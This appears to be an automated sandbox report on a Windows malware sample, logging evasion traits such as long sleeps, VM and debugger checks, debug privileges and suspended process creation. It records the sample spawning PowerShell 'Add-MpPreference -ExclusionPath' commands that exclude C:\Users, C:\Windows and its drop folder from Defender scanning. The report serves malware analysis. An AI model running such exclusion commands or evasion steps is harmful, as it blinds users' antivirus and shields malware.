Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5184	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0041E359 FindFirstFileA,FindFirstFileA,	14_2_0041E359
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00420370 FindFirstFileA,FindFirstFileA,	14_2_00420370
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042498B FindFirstFileA,FindFirstFileA,	14_2_0042498B

Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 99812	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 99687	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 99578	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 99469	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 99359	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 99249	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 99140	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 99031	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 98922	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 98812	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 98703	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 98593	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 98484	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 98375	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 98265	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 98155	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 98047	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 97937	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 97828	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 97719	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 97609	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 97497	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 97390	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 97281	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 97172	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 97062	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 96953	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 96844	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 96719	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 96609	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 96500	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 96390	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 96281	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 96172	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 96062	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 95953	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 95844	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 95719	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 95609	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 95500	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 95390	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 95281	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 95172	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 95062	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 94953	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 94843	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 94734	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 94624	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 94515	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: YYjRtxS70h.exe, 00000000.00000002.1785844596.0000000000C59000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmp	Binary or memory string: VMwareVMware
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.00000000009CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP[
Source: YYjRtxS70h.exe, 00000000.00000002.1799387443.000000000657B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: YYjRtxS70h.exe, 00000000.00000002.1785844596.0000000000C06000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to read the PEB

Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040168C mov eax, dword ptr fs:[00000030h]	14_2_0040168C
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004016AA test dword ptr fs:[00000030h], 00000068h	14_2_004016AA
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004016BB mov eax, dword ptr fs:[00000030h]	14_2_004016BB

Enables debug privileges

Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\YYjRtxS70h.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\VmTatwGQo'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\VmTatwGQo
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Windows
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\VmTatwGQo'"	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'"	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\VmTatwGQo	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Windows	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\VmTatwGQo'"	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'"	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process created: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe "C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\VmTatwGQo	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Windows	Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Queries volume information: C:\Users\user\Desktop\YYjRtxS70h.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
